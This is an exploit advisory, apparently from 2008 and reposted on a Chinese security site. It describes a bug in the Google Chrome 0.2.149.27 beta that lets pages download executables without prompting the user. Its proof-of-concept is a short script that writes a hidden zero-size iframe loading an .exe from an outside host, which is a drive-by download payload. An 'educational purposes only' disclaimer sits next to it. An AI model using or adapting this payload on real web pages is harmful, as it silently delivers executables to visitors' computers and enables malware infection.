Google Chrome Browser 0.2.149.27 Automatic File Download Exploit
|
来源:nerex[at]live[dot]com 作者:nerex 发布时间:2008-09-04
|
|
*************************************************************************** Author: nerex E-mail: nerex[at]live[dot]com
Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.
This proof-of-concept was created for educational purposes only. Use the code it at your own risk. The author will not be responsible for any damages.
Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA) ************************************************************************** <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|